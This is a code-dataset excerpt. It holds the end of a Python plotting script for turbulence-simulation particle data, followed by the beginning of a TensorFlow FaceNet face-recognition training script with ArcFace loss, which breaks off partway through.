magnitudes over time\", fontsize=25)\n # plt_vort_mags.set_xlabel(\"Time (s)\", fontsize=25)\n plt_p_rs.set_ylabel(\"r\", fontsize=25)\n plt_p_rs.set_ylim(0, 1)\n plt_p_elevs = fig.add_subplot(312)\n plt_p_elevs.set_title(\"Sample of Particle Elevation Angles over time\", fontsize=25)\n # plt_p_elevs.set_xlabel(\"Timestep\", fontsize=25)\n plt_p_elevs.set_ylabel(\"Phi (deg)\", fontsize=25)\n plt_p_elevs.set_ylim(180, 0)\n plt_p_azims = fig.add_subplot(313)\n 
plt_p_azims.set_title(\"Sample of Particle Azimuthal angles over time\", fontsize=25)\n # plt_p_azims.set_xlabel(\"Time (s)\", fontsize=25)\n plt_p_azims.set_ylabel(\"Theta (deg)\", fontsize=25)\n plt_p_azims.set_ylim(0, 360)\n\n for p in tqdm(range(len(sample))):\n r_p, phi_p, theta_p = cart2spher(dir_x[p, :], dir_y[p, :], dir_z[p, :])\n plt_p_rs.plot(r_p, '.-', linewidth=2)\n plt_p_elevs.plot(phi_p * 57.2958, '.-', linewidth=2)\n plt_p_azims.plot(theta_p * 57.2958 + 180, '.-', linewidth=2)\n for tick in plt_p_rs.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_rs.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_elevs.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_elevs.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_azims.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_azims.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n plt.subplots_adjust(hspace=0.3)\n fig.savefig(savepath)\n\n\ndef plot_particlewise_velocities(sample, filepath, savepath=None):\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n u = nc.variables[\"u\"][:][sample][:, timestamps]#[sample, timestamps]\n v = nc.variables[\"v\"][:][sample][:, timestamps]\n w = nc.variables[\"w\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(14, 7))\n plt_vel_mags = fig.add_subplot(111)\n plt_vel_mags.set_title(\"Sample of Fluid Velocity magnitudes over time\", fontsize=25)\n plt_vel_mags.set_xlabel(\"Timestep\", fontsize=25)\n plt_vel_mags.set_ylabel(\"V (m/s)\", fontsize=25)\n\n for p in tqdm(range(len(sample))):\n v_p = np.sqrt(np.power(u[p, :], 2) + np.power(v[p, :], 2) + np.power(w[p, :], 2))\n plt_vel_mags.plot(v_p / 1200, '.-', linewidth=2)\n\n for tick in plt_vel_mags.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vel_mags.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n # for tick in plt_vort_phis.xaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n # for tick in plt_vort_phis.yaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n # for tick in plt_vort_thetas.xaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n # for tick in plt_vort_thetas.yaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n fig.savefig(savepath)\n\n\ndef plot_particlewise_vorticities(sample, filepath, savepath=None):\n\n def cart2spher(v_x, v_y, v_z):\n import math\n r = np.sqrt(np.power(v_x, 2) + np.power(v_y, 2) + np.power(v_z, 2))\n phi = math.pi - np.arctan2(np.sqrt(np.power(v_x, 2) + np.power(v_y, 2)), v_z) # pi - ans because z is positive downwards\n theta = np.arctan2(v_y, v_x)\n return r, phi, theta\n\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n vort_x = nc.variables[\"vort_x\"][:][sample][:, timestamps]\n vort_y = nc.variables[\"vort_y\"][:][sample][:, timestamps]\n vort_z = nc.variables[\"vort_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(14, 16))\n plt_vort_mags = fig.add_subplot(311)\n plt_vort_mags.set_title(\"Sample of Vorticity magnitudes over time\", fontsize=25)\n # plt_vort_mags.set_xlabel(\"Time (s)\", fontsize=25)\n plt_vort_mags.set_ylabel(\"|Omega|\", fontsize=25)\n # plt_vort_mags.set_ylim(180, 0)\n plt_vort_phis = fig.add_subplot(312)\n plt_vort_phis.set_title(\"Sample of Vorticity elevation angles over time\", fontsize=25)\n # 
plt_vort_phis.set_xlabel(\"Time (s)\", fontsize=25)\n plt_vort_phis.set_ylabel(\"Phi (deg)\", fontsize=25)\n plt_vort_phis.set_ylim(180, 0)\n plt_vort_thetas = fig.add_subplot(313)\n plt_vort_thetas.set_title(\"Sample of Vorticity azimuthal angles over time\", fontsize=25)\n plt_vort_thetas.set_xlabel(\"Timestep\", fontsize=25)\n plt_vort_thetas.set_ylabel(\"Theta (deg)\", fontsize=25)\n plt_vort_thetas.set_ylim(0, 360)\n\n for p in tqdm(range(len(sample))):\n r_p, phi_p, theta_p = cart2spher(vort_x[p, :], vort_y[p, :], vort_z[p, :])\n plt_vort_mags.plot(r_p, '.-', linewidth=2)\n plt_vort_phis.plot(phi_p * 57.2958, '.-', linewidth=2)\n plt_vort_thetas.plot(theta_p * 57.2958 + 180, '.-', linewidth=2)\n\n\n for tick in plt_vort_mags.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_mags.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_phis.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_phis.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_thetas.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_thetas.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n plt.subplots_adjust(hspace=0.3)\n fig.savefig(savepath)\n\n\nif __name__ == \"__main__\":\n\n #\n # dir = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim\"\n # filepath = dir + \"/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim\"\n # savepath_hist = dir + \"/theta/mean_polar_hist_\"\n # savepath_timeseries = dir + \"/theta/mean_polar_timeseries.png\"\n # savepath_trajectories = dir + \"/traj/trajectories.png\"\n # savepath_trajectories_w_dirs = dir + \"/traj/trajectories_withdirs.png\"\n # savepath_pwise_angles = dir + \"/theta/plotpolar.png\"\n # # savepath_pwise_vels = dir + \"/velvorts/plotvels.png\"\n # # savepath_pwise_vorts = dir + \"/velvorts/plotvorts.png\"\n #\n # plot_polar_angles(filepath, savepath_hist, savepath_timeseries)\n # sample = list(np.random.choice(100000, size=10))\n # print(sample)\n # plot_trajectories(sample[0:5], False, filepath, savepath_trajectories)\n # plot_trajectories(sample[0:2], True, filepath, savepath_trajectories_w_dirs)\n # plot_particlewise_angles(sample, filepath, savepath_pwise_angles)\n\n # plot_particlewise_velocities(sample, filepath, savepath_pwise_vels)\n # plot_particlewise_vorticities(sample, filepath, savepath_pwise_vorts)\n\n # savepath_animate_dirs = \"/home/alexander/Desktop/temp_results/\"\n # animate_directions(5, filepath, savepath_animate_dirs)\n\n\n # save_plot_dir = \"/home/alexander/Documents/QMEE/LSR/fig/velocity_dist.png\"\n # H, bin_edges = histogram_cell_velocities(\"/media/alexander/AKC Passport 2TB/Maarten/sim022/F*.nc.022\", 100, saveplot=save_plot_dir)\n # np.save(\"/home/alexander/Documents/turbulence-patchiness-sims/simulations/analysis/analysis_tools/H.npy\", H)\n # np.save(\"/home/alexander/Documents/turbulence-patchiness-sims/simulations/analysis/analysis_tools/bin_edges.npy\", bin_edges)\n\n # # superimposed polar angle plots\n # B1 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_1.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_1.0B_initunif_mot_1.0vswim\"\n # B2 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim\"\n # 
B3 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_3.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_3.0B_initunif_mot_1.0vswim\"\n # B5 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_5.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_5.0B_initunif_mot_1.0vswim\"\n # B7 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_7.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_7.0B_initunif_mot_1.0vswim\"\n # filepaths_B = [B1, B2, B3, B5, B7]\n # V1 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim\"\n # V2 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.5vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.5vswim\"\n # V3 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim\"\n # V4 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.5vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.5vswim\"\n # V5 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_2.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_2.0vswim\"\n # filepaths_V = [V1, V2, V3, V4, V5]\n #\n # colours_B = np.zeros((3, 5))\n # colours_B[0, :] = np.linspace(0, 1, 5)\n # labels_B = [\"B=1\", \"B=2\", \"B=3\", \"B=5\", \"B=7\"]\n # colours_V = np.zeros((3, 5))\n # colours_V[1, :] = np.linspace(0, 1, 5)\n # labels_V = [\"V=0.1\", \"V=0.5\", \"V=1.0\", \"V=1.5\", \"V=2.0\"]\n #\n # plot_polar_angles_superimposed(filepaths_B, colours_B, labels_B, \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/comparison/theta/mean_polar_timeseries_Bvar.png\")\n # plot_polar_angles_superimposed(filepaths_V, colours_V, labels_V, \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/comparison/theta/mean_polar_timeseries_vswimvar.png\")\n\n plot_voro_concs(\n '/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim',\n './')\n\n","repo_name":"christensen5/turbulence-patchiness-sims","sub_path":"simulations/analysis/analysis_tools/analysis_tools.py","file_name":"analysis_tools.py","file_ext":"py","file_size_in_byte":40835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17093530780","text":"import os,cv2,json,time,dlib\nimport numpy as np\nimport tensorflow\nimport math\nfrom inception_resnet_v1 import inference as inception_resnet_v1\nfrom inception_resnet_v2 import inference as inception_resnet_v2\nfrom validate_on_lfw import get_paths, read_pairs, evaluate\nfrom sklearn import metrics#install scikit-learn\nfrom mask_wear_class import detect_mouth\nimport matplotlib.pyplot as plt\n\n#----tensorflow version check\nif tensorflow.__version__.startswith('1.'):\n import tensorflow as tf\n from tensorflow.python.platform import gfile\nelse:\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n import tensorflow.compat.v1.gfile as gfile\nprint(\"Tensorflow version: 
\",tf.__version__)\n\n\nclass NormDense(tf.keras.layers.Layer):\n\n def __init__(self, feature_num, classes=1000, output_name=''):\n super(NormDense, self).__init__()\n self.classes = classes\n self.w = self.add_weight(name='norm_dense_w', shape=(feature_num, self.classes),\n initializer='random_normal', trainable=True)\n self.output_name = output_name\n print(\"W shape = \", self.w.shape)\n\n # def build(self, input_shape):\n # self.w = self.add_weight(name='norm_dense_w', shape=(input_shape[-1], self.classes),\n # initializer='random_normal', trainable=True)\n\n def call(self, inputs, **kwargs):\n norm_w = tf.nn.l2_normalize(self.w, axis=0)\n x = tf.matmul(inputs, norm_w, name=self.output_name)\n\n return x\n\nclass Facenet():\n def __init__(self,para_dict):\n #----var parsing\n train_img_dir = para_dict['train_img_dir']#CASIA\n test_img_dir = para_dict['test_img_dir']#LFW\n label_dict = para_dict['label_dict']\n get_image_type = para_dict['get_image_type']\n\n mask_img_dir = r\".\\mask_img\"\n\n #----get label names to number dictionary\n # if label_dict is None:\n # label_dict = self.__get_label_dict(train_img_dir)\n # print(label_dict)\n #\n # class_num = len(label_dict.keys())\n\n # ----read training set paths and labels\n if isinstance(train_img_dir, list):\n for idx, img_dir in enumerate(train_img_dir):\n if idx == 0:\n # ----get label names to number dictionary\n label_dict = self.__get_label_dict(img_dir)\n train_paths, train_labels = self.__get_paths_labels(img_dir, label_dict,type=get_image_type)\n elif idx > 0:\n temp_paths, temp_labels = self.__get_paths_labels(img_dir, label_dict,type=get_image_type)\n if get_image_type == 'extend':\n train_paths = np.concatenate([train_paths, temp_paths], axis=0)\n train_labels = np.concatenate([train_labels, temp_labels], axis=0)\n elif get_image_type == 'append':\n train_paths.extend(temp_paths)\n train_labels.extend(temp_labels)\n\n # ----list to numpy array\n train_paths = np.array(train_paths)\n train_labels = np.array(train_labels)\n\n else:\n # ----get label names to number dictionary\n label_dict = self.__get_label_dict(train_img_dir)\n train_paths, train_labels = self.__get_paths_labels(train_img_dir, label_dict,type=get_image_type)\n class_num = len(label_dict.keys())\n print(\"train path shape:{}, train label shape:{}\".format(train_paths.shape, train_labels.shape))\n print(\"class number:\", class_num)\n\n #----read test set paths and labels\n # if test_img_dir is not None:\n # test_paths, test_labels = self.__get_paths_labels(test_img_dir,label_dict)\n # print(\"test path shape:{}, test label shape:{}\".format(test_paths.shape, test_labels.shape))\n\n #----read mask png images\n mask_files = [file.path for file in os.scandir(mask_img_dir) if file.name.split(\".\")[-1] == 'png']\n len_mask = len(mask_files)\n if len_mask == 0:\n print(\"Error: no face mask PNG images in \", mask_img_dir)\n else:\n print(\"mask image quantity:\",len_mask)\n\n #----log update\n content = dict()\n content = self.log_update(content,para_dict)\n\n #----local var to global\n self.train_img_dir = train_img_dir\n self.test_img_dir = test_img_dir\n self.label_dict = label_dict\n self.train_paths = train_paths\n self.train_labels = train_labels\n self.class_num = class_num\n self.content = content\n self.get_image_type = get_image_type\n self.mask_files = mask_files\n # if test_img_dir is not None:\n # self.test_img_dir = test_img_dir\n # self.test_paths = test_paths\n # self.test_labels = test_labels\n\n def model_init(self,para_dict):\n #----var 
parsing\n model_shape = para_dict['model_shape']#[N,H,W,C]\n infer_method = para_dict['infer_method']\n loss_method = para_dict['loss_method']\n opti_method = para_dict['opti_method']\n learning_rate = para_dict['learning_rate']\n save_dir = para_dict['save_dir']\n embed_length = para_dict['embed_length']\n\n #----tf_placeholder declaration\n tf_input = tf.placeholder(shape=model_shape,dtype=tf.float32,name='input')\n tf_keep_prob = tf.placeholder(dtype=tf.float32,name=\"keep_prob\")\n tf_label_batch = tf.placeholder(shape=[None],dtype=tf.int32,name=\"label_batch\")\n tf_phase_train = tf.placeholder(dtype=tf.bool,name=\"phase_train\")\n\n #---inference selection\n if infer_method == \"simple_resnet\":\n prelogits = self.simple_resnet(tf_input,tf_keep_prob,self.class_num)\n embeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n elif infer_method == \"inception_resnet_v1\":\n prelogits, _ = inception_resnet_v1(tf_input, tf_keep_prob, phase_train=tf_phase_train,\n bottleneck_layer_size=embed_length, weight_decay=0.0, reuse=None)\n prelogits = tf.identity(prelogits,name='prelogits')\n embeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n elif infer_method == \"inception_resnet_v2\":\n prelogits = inception_resnet_v2(tf_input, tf_keep_prob, phase_train=tf_phase_train,\n bottleneck_layer_size=embed_length, weight_decay=0.0, reuse=None)\n embeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n\n #---loss selection\n if loss_method == \"cross_entropy\":\n output = tf.layers.dense(inputs=prelogits, units=self.class_num, activation=None, name=\"output\")\n prediction = tf.nn.softmax(output,name=\"prediction\")\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf_label_batch,logits=output),\n name=\"loss\")\n elif loss_method == \"arc_loss\":\n m1 = 1.0 # logits_margin1: 1.0 # m1: sphereface should >= 1\n m2 = 0.5 # logits_margin2: 0.2 # m2: cosineface should >= 0\n m3 = 0.0 # logits_margin3: 0.3 # m3: arcface should >= 0\n s = 64.0 # logits_scale: 64.0\n\n norm_dense = NormDense(embed_length, self.class_num, output_name='prelogit')\n prelogit = norm_dense(embeddings)\n\n logit_cos = self.arcloss(embeddings, prelogit, tf_label_batch, m1, m2, m3, s)\n prediction = tf.nn.softmax(logit_cos, name='prediction')\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=tf_label_batch, logits=logit_cos), name='loss')\n\n #----optimizer selection\n if opti_method == \"adam\":\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)\n elif opti_method == 'adagrad':\n optimizer = tf.train.AdagradOptimizer(learning_rate).minimize(loss)\n\n # ----face detection init\n self.detector = dlib.get_frontal_face_detector()\n self.predictor = dlib.shape_predictor('src/models/shape_predictor_68_face_landmarks.dat')\n\n\n #----create the dir to save model weights(CKPT, PB)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n out_dir_prefix = os.path.join(save_dir,\"model\")\n saver = tf.train.Saver(max_to_keep=5)\n\n\n #----appoint PB node names\n pb_save_path = os.path.join(save_dir,\"pb_model.pb\")\n pb_save_list = ['prelogits','prediction',\"embeddings\"]\n\n\n #----create the log(JSON)\n count = 0\n for i in range(100):\n log_path = os.path.join(save_dir,\"train_result_\" + str(count) + \".json\")\n if not os.path.exists(log_path):\n break\n count += 1\n print(\"log_path: \",log_path)\n self.content = self.log_update(self.content,para_dict)\n\n #----local var to global\n 
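# keep the placeholders, ops, and file paths on the instance; train() below feeds and runs these same graph nodes\n        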
self.tf_input = tf_input\n self.tf_keep_prob = tf_keep_prob\n self.tf_label_batch = tf_label_batch\n self.tf_phase_train = tf_phase_train\n self.embeddings = embeddings\n self.optimizer = optimizer\n self.prediction = prediction\n self.out_dir_prefix = out_dir_prefix\n self.saver = saver\n self.pb_save_path = pb_save_path\n self.pb_save_list = pb_save_list\n self.log_path = log_path\n self.save_dir = save_dir\n self.model_shape = model_shape\n self.loss = loss\n\n def train(self,para_dict):\n #----var parsing\n epochs = para_dict['epochs']\n GPU_ratio = para_dict['GPU_ratio']\n batch_size = para_dict['batch_size']\n ratio=para_dict['ratio']\n select_num = para_dict['select_num']\n process_dict = para_dict['process_dict']\n aug_times = para_dict['aug_times']\n test_acc_threshold = 0.965\n\n #----local var\n train_loss_list = list()\n train_acc_list = list()\n test_loss_list = list()\n test_acc_list = list()\n epoch_time_list = list()\n img_quantity = 0\n aug_enable = False\n p_dict_1 = {'rdm_mask': False, 'rdm_crop': True, 'rdm_br': True, 'rdm_blur': True, 'rdm_flip': True,\n 'rdm_noise': False, 'rdm_angle': True}\n p_dict_2 = {'rdm_mask': True, 'rdm_crop': True, 'rdm_br': True, 'rdm_blur': True, 'rdm_flip': True,\n 'rdm_noise': False, 'rdm_angle': True}\n p_dict_3 = {'rdm_mask': True, 'rdm_crop': True, 'rdm_br': True, 'rdm_blur': True, 'rdm_flip': True,\n 'rdm_noise': False, 'rdm_angle': True}\n\n self.content = self.log_update(self.content, para_dict)\n\n #----ratio\n # if ratio <= 1.0:\n # img_quantity = int(self.train_paths.shape[0] * ratio)\n # else:\n # img_quantity = self.train_paths.shape[0]\n\n\n\n #----check if the augmentation(image processing) is enabled\n if isinstance(process_dict,dict):\n if True in process_dict.values():\n aug_enable = True\n batch_size = batch_size // aug_times #the batch size must be integer!!\n\n\n #----calculate iterations of one epoch\n #train_ites = math.ceil(img_quantity / batch_size)\n # if self.test_img_dir is not None:\n # test_ites = math.ceil(self.test_paths.shape[0] / batch_size)\n\n #----GPU setting\n config = tf.ConfigProto(log_device_placement=True,\n allow_soft_placement=True)\n if GPU_ratio is None:\n config.gpu_options.allow_growth = True\n else:\n config.gpu_options.per_process_gpu_memory_fraction = GPU_ratio\n\n with tf.Session(config=config) as sess:\n #----tranfer learning check\n files = [file.path for file in os.scandir(self.save_dir) if file.name.split(\".\")[-1] == 'meta']\n if len(files) == 0:\n sess.run(tf.global_variables_initializer())\n print(\"no previous model param can be used!\")\n else:\n check_name = files[-1].split(\"\\\\\")[-1].split(\".\")[0]\n model_path = os.path.join(self.save_dir,check_name)\n self.saver.restore(sess,model_path)\n msg = \"use previous model param:{}\".format(model_path)\n print(msg)\n\n #----epoch training\n for epoch in range(epochs):\n #----record the start time\n d_t = time.time()\n\n train_loss = 0\n train_acc = 0\n test_loss = 0\n test_acc = 0\n\n #----training data process\n t_1 = time.time()\n if ratio is not None:\n if ratio <= 1.0:\n img_quantity = int(self.train_paths.shape[0] * ratio)\n else:\n img_quantity = self.train_paths.shape[0]\n # ----shuffle\n indice = np.random.permutation(self.train_paths.shape[0])\n self.train_paths = self.train_paths[indice]\n self.train_labels = self.train_labels[indice]\n train_paths_ori = self.train_paths[:img_quantity]\n train_labels_ori = self.train_labels[:img_quantity]\n elif select_num is not None:\n select_num = int(select_num)\n if select_num >= 
1:\n #----reset paths and lables\n train_paths_ori = list()\n train_labels_ori = list()\n #----select images from each folder\n for paths,labels in zip(self.train_paths,self.train_labels):\n np.random.shuffle(paths)\n num = np.minimum(len(paths), select_num)\n train_paths_ori.extend(paths[:num])\n train_labels_ori.extend(labels[:num])\n #----list to np array\n train_paths_ori = np.array(train_paths_ori)\n train_labels_ori = np.array(train_labels_ori)\n #----shuffle\n indice = np.random.permutation(train_paths_ori.shape[0])\n train_paths_ori = train_paths_ori[indice]\n train_labels_ori = train_labels_ori[indice]\n\n #----calculate the image quantity\n img_quantity = train_paths_ori.shape[0]\n else:\n print(\"select number is under 1\")\n raise ValueError\n t_1 = time.time() - t_1\n print(\"\\nTime of preparing the training data: \",t_1)\n\n # ----calculate iterations of one epoch\n train_ites = math.ceil(img_quantity / batch_size)\n\n # ----info display\n print(\"img_quantity:\", img_quantity)\n if aug_enable is True:\n print(\"aug_enable is True, the data quantity of one epoch is {} times\".format(aug_times))\n\n\n # if aug_enable is True:\n # train_paths_aug = train_paths_ori[::-1]\n # train_labels_aug = train_labels_ori[::-1]\n\n #----do optimizers(training by iteration)\n for index in range(train_ites):\n #----get image start and end numbers\n num_start = index * batch_size\n num_end = np.minimum(num_start + batch_size, train_paths_ori.shape[0])\n paths = train_paths_ori[num_start:num_end]\n labels = train_labels_ori[num_start:num_end]\n\n # ----get 4-D data\n if aug_enable is True:\n for i in range(aug_times):\n if i == 0:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=None)\n batch_data = temp\n batch_labels = labels\n elif i == 1:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=p_dict_1)\n elif i == 2:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=p_dict_2)\n elif i == 3:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=p_dict_3)\n\n if i > 0:\n batch_data = np.concatenate([batch_data, temp], axis=0)\n batch_labels = np.concatenate([batch_labels, labels], axis=0)\n\n indice = np.random.permutation(batch_data.shape[0])\n batch_data = batch_data[indice]\n batch_labels = batch_labels[indice]\n else:\n batch_data = self.get_4D_data(train_paths_ori[num_start:num_end], self.model_shape[1:])\n batch_labels = train_labels_ori[num_start:num_end]\n #----images display(test code)\n #set batch size = 4 and not shuffle\n # print(\"batch_data shape:\", batch_data.shape)\n # for i in range(aug_times):\n # plt.subplot(1, aug_num, i + 1)\n # plt.imshow(batch_data[i])\n # plt.axis('off')\n #\n # plt.show()\n\n #----put all data to tf placeholders\n feed_dict = {self.tf_input:batch_data,\n self.tf_label_batch:batch_labels,\n self.tf_keep_prob:0.8,\n self.tf_phase_train:True}\n #----session run\n sess.run(self.optimizer,feed_dict=feed_dict)\n #----evaluation(training set)\n feed_dict[self.tf_keep_prob] = 1.0\n feed_dict[self.tf_phase_train] = False\n loss_temp, predict_temp = sess.run([self.loss, self.prediction], feed_dict=feed_dict)\n\n # ----calculate the loss and accuracy\n train_loss += loss_temp\n train_acc += self.evaluation(predict_temp, batch_labels)\n\n train_loss /= train_ites\n train_acc /= img_quantity\n if aug_enable is True:#divided by aug_times because the training data quantity is multiplied by aug_times\n train_acc /= aug_times\n\n #-----testing set(LFW) evaluation\n if self.test_img_dir is not None:\n 
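# eval_on_lfw() embeds every LFW pair with the current weights and returns the 10-fold verification accuracy\n                    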
test_acc = self.eval_on_lfw(sess, feed_dict, self.test_img_dir, batch_size=batch_size)\n\n #print(\"train_loss:{}, train_acc:{}\".format(train_loss,train_acc))\n\n #----evaluation(test set)\n # if self.test_img_dir is not None:\n # for index in range(test_ites):\n # # ----get image start and end numbers\n # num_start = index * batch_size\n # num_end = np.minimum(num_start + batch_size, self.test_paths.shape[0])\n #\n # batch_data = self.get_4D_data(self.test_paths[num_start:num_end], self.model_shape[1:])\n #\n # # ----put all data to tf placeholders\n # feed_dict = {self.tf_input: batch_data,\n # self.tf_label_batch: self.test_labels[num_start:num_end],\n # self.tf_keep_prob: 1.0}\n #\n # # ----session run\n # loss_temp, predict_temp = sess.run([self.loss, self.prediction], feed_dict=feed_dict)\n #\n # # ----calculate the loss and accuracy\n # test_loss += loss_temp\n # test_acc += self.evaluation(predict_temp, self.test_labels[num_start:num_end])\n #\n # test_loss /= test_ites\n # test_acc /= self.test_paths.shape[0]\n # #print(\"test_loss:{}, test_acc:{}\".format(test_loss, test_acc))\n\n #----save ckpt, pb files\n model_save_path = self.saver.save(sess,self.out_dir_prefix,global_step=epoch)\n print(\"save model CKPT to \",model_save_path)\n\n graph = tf.get_default_graph().as_graph_def()\n output_graph_def = tf.graph_util.convert_variables_to_constants(sess,graph,self.pb_save_list)\n with tf.gfile.GFile(self.pb_save_path,'wb')as f:\n f.write(output_graph_def.SerializeToString())\n print(\"save PB file to \",self.pb_save_path)\n\n if test_acc > test_acc_threshold:\n pb_save_path = \"pb_{}.pb\".format(np.round(float(test_acc*100),1))\n pb_save_path = os.path.join(self.save_dir,pb_save_path)\n graph = tf.get_default_graph().as_graph_def()\n output_graph_def = tf.graph_util.convert_variables_to_constants(sess, graph, self.pb_save_list)\n with tf.gfile.GFile(pb_save_path, 'wb')as f:\n f.write(output_graph_def.SerializeToString())\n\n test_acc_threshold = test_acc\n\n #----record the end time\n d_t = time.time() - d_t\n\n #----save results in the log file\n train_loss_list.append(float(train_loss))\n train_acc_list.append(float(train_acc))\n if self.test_img_dir is not None:\n #test_loss_list.append(float(test_loss))\n test_acc_list.append(float(test_acc))\n\n self.content[\"train_loss_list\"] = train_loss_list\n self.content[\"train_acc_list\"] = train_acc_list\n if self.test_img_dir is not None:\n #self.content[\"test_loss_list\"] = test_loss_list\n self.content[\"test_acc_list\"] = test_acc_list\n\n epoch_time_list.append(d_t)\n self.content['ave_epoch_time'] = float(np.average(epoch_time_list))\n\n with open(self.log_path, 'w') as f:\n json.dump(self.content,f)\n\n print(\"save the log file in \",self.log_path)\n\n\n\n #----display training results\n print(\"\\nEpoch: \",epoch)\n print(\"training loss:{}, accuracy:{}\".format(train_loss,train_acc))\n if self.test_img_dir is not None:\n print(\"test set accuracy:{}\".format( test_acc))\n\n print(\"Epoch time consumption:\",d_t)\n\n #----loss functions\n def arcloss(self, x, normx_cos, labels, m1, m2, m3, s):\n norm_x = tf.norm(x, axis=1, keepdims=True)\n print(\"norm_x shape = \", norm_x.shape)\n cos_theta = normx_cos / norm_x\n theta = tf.acos(cos_theta)\n mask = tf.one_hot(labels, depth=normx_cos.shape[-1])\n zeros = tf.zeros_like(mask)\n cond = tf.where(tf.greater(theta * m1 + m3, math.pi), zeros, mask)\n cond = tf.cast(cond, dtype=tf.bool)\n m1_theta_plus_m3 = tf.where(cond, theta * m1 + m3, theta)\n cos_m1_theta_plus_m3 = 
